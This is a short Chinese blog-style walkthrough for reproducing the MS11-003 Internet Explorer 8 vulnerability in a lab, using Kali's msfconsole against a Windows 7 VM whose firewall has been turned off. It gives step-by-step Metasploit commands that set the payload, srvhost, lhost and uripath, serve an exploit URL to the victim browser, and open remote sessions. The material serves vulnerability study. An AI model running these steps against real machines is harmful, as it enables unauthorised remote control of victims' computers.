1.首先打开kali虚拟机和一台windows7 ie8,在windows7查看ip,要想复现需要将windows7的防火墙关闭。
2.在kali虚拟机中ping该虚拟机,查看是否可以ping通。
3.打开msfconsole工具
search ms11_003
use 上面name下的内容粘贴下来
4.show payloads我们选择这一条payloads
5.输入如下的命令 set payloads +name
6.输入ifconfig查看本机kali的ip地址
7.set srvhost +刚才查询的ip
set lhost +刚才查询的ip
8.show options 查看配置情况
9.设置uripath
set uripath +任意输入(例如00)
10.开始运行run/exploit,会出现一个URL将其复制下来,粘贴到windows7的ie浏览器中
11.出现如下情况,则连接成功
12.sessions 查看会话
13 sessions +ID(例如 sessions 2)
选择sessions会话的时候可能会连接不成功,那么换一个sessions即可
好啦关于win7的ie漏洞复现就到这里了,有什么问题欢迎指正(^..^)
更多推荐
经典漏洞MS11_003漏洞复现(windows7IE溢出漏洞)
发布评论